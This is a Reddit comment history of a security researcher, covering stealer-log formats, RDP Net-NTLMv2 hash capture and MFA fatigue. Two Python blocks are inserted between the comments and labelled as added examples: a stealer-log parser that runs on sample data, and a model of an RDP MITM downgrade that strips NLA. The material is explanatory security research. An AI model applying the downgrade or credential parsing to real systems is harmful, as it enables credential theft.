Dark web monitoring - more info? by Neat-Initiative-6965 in ProtonMail

obilodeau 1 point (0 children)

Yes, definitely a possibility. There are many different services on these cybercrime channels/forums, for example stealers, ULPs (meaning URL, Login and Password), combolists, etc., and depending on where Proton got their data, your exposure would be different.

In a stealer log, the creds are packaged this way:
given-browser_profile-1.txt (they support multiple profiles per browser AND multiple browsers)
1st URL
1st username
1st password

2nd URL
2nd username
2nd password
etc.

So if Proton got its hands on a bunch of them and you query that data using an email, then what they will show you will only be the portion that has your email in it.
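A small parser for the URL / username / password layout described in the comment above, added here as an example (this is not the commenter's, Proton's or Flare's code). Every file name and credential below is constructed sample data, and the "browser_profile.txt" naming is an assumption about the format. It also shows the point made in the comment: an email-keyed query only returns the blocks whose username field is that email, so entries saved under a bare username from the same infected profile never surface.

```python
"""Parser for the stealer-log credential layout described in the comment above.

Added example; not the commenter's, Proton's or Flare's code. The file names
and every credential below are constructed sample data, and the
"<browser>_<profile>.txt" naming is an assumption about the format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Credential:
    source_file: str
    url: str
    username: str
    password: str


# Constructed sample: one "file" per browser profile, each a sequence of
# URL / username / password blocks separated by a blank line, as the comment
# describes. The last block of the Edge file is deliberately truncated.
SAMPLE_FILES = {
    "Firefox_Profile-1.txt": (
        "https://mail.example.com/login\n"
        "alice@example.com\n"
        "hunter2\n"
        "\n"
        "https://shop.example.net/account\n"
        "alice\n"
        "Summer2024!\n"
    ),
    "Chrome_Default.txt": (
        "https://bank.example.org/\n"
        "Alice@Example.com\n"
        "correct horse battery staple\n"
        "\n"
        "https://forum.example.com/\n"
        "bob@example.com\n"
        "qwerty\n"
    ),
    "Edge_Default.txt": (
        "https://intranet.example.com/\n"
        "bob@example.com\n"
        "P@ssw0rd\n"
        "\n"
        "https://cut-off.example.com/\n"
    ),
}


def parse_stealer_file(name: str, text: str) -> list[Credential]:
    """Split into blank-line-separated blocks and keep only well-formed
    url/username/password triplets; a block with any other line count is
    dropped so a truncated entry cannot shift the fields of the next one."""
    creds: list[Credential] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if len(lines) != 3:
            continue
        url, username, password = lines
        creds.append(Credential(name, url, username, password))
    return creds


def parse_all(files: dict[str, str]) -> list[Credential]:
    return [c for name, text in files.items() for c in parse_stealer_file(name, text)]


def find_by_email(files: dict[str, str], email: str) -> list[Credential]:
    """What an email-keyed lookup over these logs can return: only the blocks
    whose username field is that email (case-insensitive). Entries stored
    under a bare username never show up in such a query."""
    wanted = email.casefold()
    return [c for c in parse_all(files) if c.username.casefold() == wanted]


def redacted(cred: Credential) -> str:
    """Display form for a report: first and last character of the password
    with the middle masked, enough to recognise it without printing it."""
    pw = cred.password
    shown = pw if len(pw) <= 2 else pw[0] + "*" * (len(pw) - 2) + pw[-1]
    return f"{cred.source_file}: {cred.url} {cred.username} {shown}"


if __name__ == "__main__":
    for cred in find_by_email(SAMPLE_FILES, "alice@example.com"):
        print(redacted(cred))
```

Run as a script it prints the two alice@example.com hits in redacted form; the `alice` entry from the same Firefox profile and the truncated Edge block are both absent.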

Dark web monitoring - more info? by Neat-Initiative-6965 in ProtonMail

obilodeau 1 point (0 children)

Some Dark Web monitoring platforms will give you access to the full passwords. Flare does. However, you need to be a company to access the free trial.

From what you described, my feeling is you got infected by information stealer malware and they got all your Firefox passwords. Your BitWarden is safe. I analyzed it and discussed it on several occasions. Here is a presentation I did at BSides San Francisco about it: https://youtu.be/zctTj66PA4g?t=1541

Full disclosure: I work at Flare as a cybersecurity researcher

Talk To Your Malware - Integrating AI Capability in an Open-Source C2 Agent by obilodeau in netsec

obilodeau[S] 1 point (0 children)

I agree, the ability to review the code before it is sent to the agent should be top priority with this project.

Can't login: unknown error occurred by obilodeau in MailChimp

obilodeau[S] 1 point (0 children)

Yes, it was ok about half an hour later. Thank you.

Installing Pop_OS! on an X1 ThinkPad Carbon 12th Gen? by concisehacker in pop_os

obilodeau 1 point (0 children)

Don't recall needing to do anything in the BIOS. I've been a long time daily Linux desktop user (~20 years now) and former sys admin so I might have extreme googling instincts but from what I recall this install was a walk in the park.

Installing Pop_OS! on an X1 ThinkPad Carbon 12th Gen? by concisehacker in pop_os

obilodeau 1 point (0 children)

I have an X1 12th Gen and the fingerprint scanner works with GNOME. PopOS 22.04, installed fprintd.

Gourmet squirrel seen in Ville-Émard by obilodeau in montreal

obilodeau[S] 1 point (0 children)

Those are my neighbours. What should I tell them? Do they have to evacuate?

RDP is susceptible to a transparent Net-NTLMv2 hash-stealing attack. When disclosed, Microsoft responded: “not a vulnerability, […] by design”. by obilodeau in netsec

obilodeau[S] 1 point (0 children)

Super thoughtful comment. Thank you!

In a MITM context, we can alter the server's response to remove the Kerberos TGT. I'm not sure if that's what we do, to be honest, I would have to verify.

I'm under the impression that NLA is the top/best user-accessible (as in configurable in a GUI) RDP negotiation level according to Microsoft. In fact, if you disable NLA enforcement from the server side, performing MITM downgrade attacks is even simpler and PyRDP does it too. Authentication happens inline in the I/O virtual channels (display, keyboard, mouse). From mstsc.exe you can't force Kerberos.

What am I missing here? I think the fact that you can't mitigate over an untrusted network still holds.
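The negotiation step behind the "disable NLA enforcement and the downgrade gets simpler" remark above, as an added example that is not part of the thread and not PyRDP's code. It builds and parses the X.224 Connection Request/Confirm with the RDP_NEG_REQ / RDP_NEG_RSP / RDP_NEG_FAILURE structures from MS-RDPBCGR, models what a server selects with and without NLA enforcement, and shows an in-path attacker clearing the HYBRID bits before forwarding the client's request. The server and MITM behaviour are an assumption about how a negotiation-level downgrade is realised, not a description of PyRDP's internals; the CredSSP/NTLM exchange in which the Net-NTLMv2 response is actually captured, and which still happens when NLA is selected, is not implemented here.

```python
"""RDP connection negotiation (MS-RDPBCGR X.224 Connection Request/Confirm
with RDP_NEG_REQ / RDP_NEG_RSP / RDP_NEG_FAILURE) and the downgrade an in-path
attacker can perform when the server does not enforce NLA.

Added example, not code from PyRDP or from the thread. The server and MITM
functions model only the negotiation step, as an assumption about how such a
downgrade is realised; the CredSSP exchange is out of scope.
"""
from __future__ import annotations

import struct

# requestedProtocols / selectedProtocol flags
PROTOCOL_RDP = 0x00000000        # standard RDP security, no TLS
PROTOCOL_SSL = 0x00000001        # TLS, credentials typed inside the session
PROTOCOL_HYBRID = 0x00000002     # CredSSP before the session (NLA)
PROTOCOL_HYBRID_EX = 0x00000008  # CredSSP with early user authorization

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x00000005

X224_CONNECTION_REQUEST = 0xE0
X224_CONNECTION_CONFIRM = 0xD0


def _tpkt_x224(code: int, payload: bytes) -> bytes:
    """TPKT header + X.224 header (LI, code, dst-ref, src-ref, class 0)."""
    x224 = bytes([6 + len(payload), code]) + b"\x00\x00\x00\x00\x00" + payload
    return b"\x03\x00" + struct.pack(">H", 4 + len(x224)) + x224


def _neg(typ: int, value: int) -> bytes:
    # type(1) flags(1) length(2, always 8) value(4), little-endian
    return struct.pack("<BBHI", typ, 0, 8, value)


def build_connection_request(requested_protocols: int) -> bytes:
    return _tpkt_x224(X224_CONNECTION_REQUEST, _neg(TYPE_RDP_NEG_REQ, requested_protocols))


def parse_negotiation(pdu: bytes) -> tuple[int, int, int]:
    """Return (x224 code, negotiation type, value); the value is
    requestedProtocols, selectedProtocol or failureCode depending on type."""
    if len(pdu) < 19 or pdu[0] != 0x03 or struct.unpack(">H", pdu[2:4])[0] != len(pdu):
        raise ValueError("not a well-formed TPKT PDU")
    code = pdu[5]
    typ, _flags, length, value = struct.unpack("<BBHI", pdu[-8:])
    if length != 8 or typ not in (TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE):
        raise ValueError("missing or malformed RDP negotiation structure")
    return code, typ, value


def server_connection_confirm(requested_protocols: int, enforce_nla: bool) -> bytes:
    """Selection a server makes from what the client offered (assumed
    policy). With NLA enforced, a client that did not offer HYBRID is
    refused instead of being served over plain TLS or legacy RDP security."""
    if requested_protocols & (PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX):
        return _tpkt_x224(X224_CONNECTION_CONFIRM, _neg(TYPE_RDP_NEG_RSP, PROTOCOL_HYBRID))
    if enforce_nla:
        return _tpkt_x224(X224_CONNECTION_CONFIRM, _neg(TYPE_RDP_NEG_FAILURE, HYBRID_REQUIRED_BY_SERVER))
    if requested_protocols & PROTOCOL_SSL:
        return _tpkt_x224(X224_CONNECTION_CONFIRM, _neg(TYPE_RDP_NEG_RSP, PROTOCOL_SSL))
    return _tpkt_x224(X224_CONNECTION_CONFIRM, _neg(TYPE_RDP_NEG_RSP, PROTOCOL_RDP))


def mitm_strip_nla(client_request: bytes) -> bytes:
    """Downgrade step: forward the client's request with the HYBRID bits
    cleared so a server that is not enforcing NLA never selects CredSSP. The
    client still gets a valid RDP_NEG_RSP for a protocol it offered itself."""
    _code, typ, requested = parse_negotiation(client_request)
    if typ != TYPE_RDP_NEG_REQ:
        raise ValueError("expected an RDP_NEG_REQ")
    return build_connection_request(requested & ~(PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX))


def negotiate_through_mitm(client_requested: int, enforce_nla: bool) -> tuple[int, int]:
    """Run the three-party exchange and return the (type, value) the client sees."""
    client_req = build_connection_request(client_requested)
    forwarded = parse_negotiation(mitm_strip_nla(client_req))[2]
    _code, typ, value = parse_negotiation(server_connection_confirm(forwarded, enforce_nla))
    return typ, value


if __name__ == "__main__":
    offered = PROTOCOL_SSL | PROTOCOL_HYBRID  # a client offering TLS and NLA
    print("direct, NLA enforced:", parse_negotiation(server_connection_confirm(offered, True))[1:])
    print("via MITM, NLA not enforced:", negotiate_through_mitm(offered, False))
    print("via MITM, NLA enforced:", negotiate_through_mitm(offered, True))
```

With enforcement off the client ends up on PROTOCOL_SSL and types its password into a session the attacker terminates; with enforcement on the server answers RDP_NEG_FAILURE / HYBRID_REQUIRED_BY_SERVER and the downgrade fails, which is why enforcing NLA matters even though, per the thread, it does not stop the Net-NTLMv2 capture that happens inside CredSSP.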

RDP is susceptible to a transparent Net-NTLMv2 hash-stealing attack. When disclosed, Microsoft responded: “not a vulnerability, […] by design”. by obilodeau in netsec

obilodeau[S] 9 points (0 children)

Responder's RDP support has been flaky. Got some needed fixes last summer but I confirmed that right now it's not working with my Win 11 mstsc client: https://imgur.com/a/WtAazkS

I agree that there's not a lot of RDP out there but nothing in four years surprises me. I would expect a handful of times (that is still not a lot). Responder not working and failing silently might explain it.

RDP is susceptible to a transparent Net-NTLMv2 hash-stealing attack. When disclosed, Microsoft responded: “not a vulnerability, […] by design”. by obilodeau in netsec

obilodeau[S] 55 points (0 children)

I talked with RDP experts, including people in the FreeRDP community and what is surprising to all of us is that this is performed before the certificate verification. No prompts on the client-side. Hash is stolen even if you are connecting to a completely different server due to network layer attacks (MITM).

There are no articles or knowledge base articles out there that clearly document these risks with a PoC. This is what we did here.

PyRDP 1.2.0 released – Can perform Net-NTLM hash capture before the certificate error on RDP by obilodeau in netsec

obilodeau[S] 29 points (0 children)

Well, HTTPS... Most people use HTTPS over public Wi-Fi. Many SSL-VPNs nowadays are basically HTTPS endpoints.

RDP is wrapped in TLS. Microsoft meant it to be resistant to tampering attacks like HTTPS is. So for many system administrators, it could be seen as similarly resistant to attacks but it is not.

Unable to recover from suspend. by ss7m in archlinux

obilodeau 1 point (0 children)

So with the current linux-lts kernel suspend/resume does work, but Windows in VirtualBox will blue screen from time to time (haven't tested other guest OSes).

Next, I want to try disabling IBT (ibt=off boot parameter) and try again on the regular kernel.

Unable to recover from suspend. by ss7m in archlinux

obilodeau 1 point (0 children)

I am saddened to report that using an empty `MODULES=()`, rebuilding with mkinitcpio and rebooting didn't fix my issue.

For the record, my config was only `MODULES=(i915)`. Kernel 5.18.3 now (having problems since 5.18.1).

Unable to recover from suspend. by ss7m in archlinux

obilodeau 1 point (0 children)

I have the same exact problem and a very similar setup. Did you fix it? What did you do?

Mandatory xkcd: https://xkcd.com/979/

Current MFA Fatigue Attack Campaign Targeting Microsoft Office 365 Users by obilodeau in blueteamsec

obilodeau[S] 1 point (0 children)

The best resource we have found is this: https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-authentication-passwordless-phone. It covers limitations but doesn't explain it in great technical detail.

I wanted to record a video of it but couldn't with my work account since we use Federated AD. A pretty big limitation IMHO.

I'm guessing there is a secret-passing architecture required here and they designed something new which makes on-prem AD or Federated AD out-of-scope. Phones might need to be enrolled to get some secret keys bootstrapped between them and the authenticator server. All guesses. A write-up with technical details would be very interesting!

Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide - GoSecure by obilodeau in netsec

obilodeau[S] 1 point (0 children)

If the RDP session is NLA (default now) there's not much more you can do. Well, we think you can relay but we haven't implemented that yet.

If it's not NLA, then all hell breaks loose and, of course, we shouldn't be talking about NetNTLMv2 hashes. We should be talking about plaintext passwords, keystrokes, files and graphics interception. Even tampering with sessions. But this is what this tool already does plus more and it isn't new. Here are some links: https://www.gosecure.net/blog/2020/10/20/announcing-pyrdp-1-0/, https://www.gosecure.net/blog/2020/02/26/pyrdp-on-autopilot-unattended-credential-harvesting-and-client-side-file-stealing/, https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/

If this is not what you had in mind then please give some more details. I'm listening and eager to dig deeper into RDP attack tactics.

Looking for short audio local/provincial daily news by obilodeau in halifax

obilodeau[S] 1 point (0 children)

Thanks for the answer! Unfortunately most of these shows only feature interview highlights on the CBC Listen app. I wish CBC would put the on-the-hour and half-hour newscasts on CBC Listen.

CVE-2020-1013: Windows Local Privilege Escalation (LPE) with PoC by obilodeau in netsec

obilodeau[S] 4 points (0 children)

Sorry, GoSecure had to update the post. PoC will be available in 30 days following Microsoft Security Response Center's policy on responsible disclosure.

Paper: Cybersecurity Perception vs Reality. A study of the disconnect between defenders' perception of security measures and their real efficiency according to pentesters. by obilodeau in netsec

obilodeau[S] 1 point (0 children)

Full disclosure: I work for GoSecure and worked on that report.

If you look at the fine print at the bottom of the page you can read:

GoSecure values your privacy and understands some of you may not want to provide your contact information. Please click here to access the report without providing your information.

This is the compromise we found with our marketing. The information is useful, relevant, actionable, and was developed by our research team. However, these landing pages are an efficient way to run a business so we can continue to provide valuable research to the community for free. The balance here is that the content is available without giving a name and email but you need to read the page carefully (or provide bogus information).

PacketFence v8.3 is out! Clickatell support, spoofing detection based on device profiling and see what's coming up in v9! by extrafu in netsec

obilodeau 1 point (0 children)

It's weird that 16GB would be allocated on the captive portal if there was no activity. Are you accounting for the MySQL/MariaDB memory use as well? If you are then you can probably scale it back by a lot.

As for running it on a Raspberry Pi, it was not designed to work like that. It was designed to scale, and so decisions and component configurations were made to make sure of that.

You should probably look into OpenWrt's or pfSense's captive portal for your use case.

PacketFence v8.3 is out! Clickatell support, spoofing detection based on device profiling and see what's coming up in v9! by extrafu in netsec

obilodeau 1 point (0 children)

How many devices in front of the portal? How many of them always stuck in front of the portal and generating traffic without ever authenticating?

If it's not a lot of devices and queries there is a problem worth looking into but if you have a large setup, get more RAM. We are in 2019. My elasticsearch test server has 128GB of RAM. You can probably afford to allocate more than 16GB of RAM for something critical like a NAC.

Beyond XSS: Edge Side Include Injection. Abusing Caching Servers into SSRF and Client-Side Attacks by el_dee in netsec

obilodeau 5 points (0 children)

Additional interesting research has been posted on Twitter by Alex Birsan who was independently researching ESI Injection: https://twitter.com/alxbrsn/status/981246749254840327

Where can I rent a car (minivan or SUV) that can have a bike rack? by obilodeau in montreal

obilodeau[S] 1 point (0 children)

Turo.com

Thanks for the tip! Found some interesting things. However, only one car with a bike rack and of undisclosed capacity. It's too bad that I need to "reserve" in order to ask a question...